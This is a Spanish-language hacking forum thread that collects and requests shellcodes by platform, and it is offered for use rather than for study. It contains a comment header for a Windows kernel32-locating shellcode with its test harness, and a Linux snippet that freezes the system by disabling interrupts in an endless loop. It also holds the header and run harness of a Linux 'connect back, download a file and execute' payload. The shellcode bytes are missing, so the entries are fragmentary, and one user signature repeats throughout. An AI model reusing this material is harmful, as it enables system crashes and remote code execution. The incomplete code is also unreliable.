Group: Root Admin
Posts: 1,490
Joined: 1-June 07
From: Argentina
Member No.: 2,479
No tenemos ningun post dedicado a juntar o pedir shellcodes, así que inauguro éste. Por cuestión de organización una sola shellcode por post. Con el código (entre etiquetas [ code]), peso de la shellcode en bytes (en negritas [b-]) y plataforma donde corre (en negritas [b ]). Opcional: Descipción (en italica [ i]) y autor subrayado [ u].
En este post linkearé cada shellcode ordenadas por plataformas.
(Se irán agregando plataformas a medida que haya mas shellcodes)
--------------------
QUOTE
Much like a baby is comforted by the rhythmic heartbeat and protective arms of a mother, so too am I comforted by monitors, logs, throughput graphs, scrolling shells; the dull background thrum of my infrastructure, all speaking the steady pulse of the network.
// // PEB way of getting kernel32 imagebase by loco. // Compatible with all Win9x/NT based operating systems. // // Gives kernel32 imagebase in eax when executing. // 29 bytes, only eax/esi used. // // Originally discovered by Dino Dai Zovi. // //
int main() { printf("Shellcode is %u bytes.\n\n", sizeof(Shellcode)-1); return 1; }
--------------------
QUOTE
Much like a baby is comforted by the rhythmic heartbeat and protective arms of a mother, so too am I comforted by monitors, logs, throughput graphs, scrolling shells; the dull background thrum of my infrastructure, all speaking the steady pulse of the network.
Much like a baby is comforted by the rhythmic heartbeat and protective arms of a mother, so too am I comforted by monitors, logs, throughput graphs, scrolling shells; the dull background thrum of my infrastructure, all speaking the steady pulse of the network.
############################################################ ### iopl(3); asm("cli"); while(1){} // * this code cause freezeing system ############################################################ #####
Much like a baby is comforted by the rhythmic heartbeat and protective arms of a mother, so too am I comforted by monitors, logs, throughput graphs, scrolling shells; the dull background thrum of my infrastructure, all speaking the steady pulse of the network.
Group: Root Admin
Posts: 1,490
Joined: 1-June 07
From: Argentina
Member No.: 2,479
linux/x86 connect back, download a file and execute 149 bytes
Autor: militan <militan.c7 [at] gmail.com>
shellcode:
CODE
/* ;file download shellcode (149 bytes) ; ;connect back, download a file and execute. ;modify the name of the file and the ip address first. ; ;militan ;Advanced Defense Lab(ADL) ;
void k(){ int *ret; ret=(int *)&ret+2; (*ret)=(int)shellcode; }
int main (){ k(); return 0; }
--------------------
QUOTE
Much like a baby is comforted by the rhythmic heartbeat and protective arms of a mother, so too am I comforted by monitors, logs, throughput graphs, scrolling shells; the dull background thrum of my infrastructure, all speaking the steady pulse of the network.
Much like a baby is comforted by the rhythmic heartbeat and protective arms of a mother, so too am I comforted by monitors, logs, throughput graphs, scrolling shells; the dull background thrum of my infrastructure, all speaking the steady pulse of the network.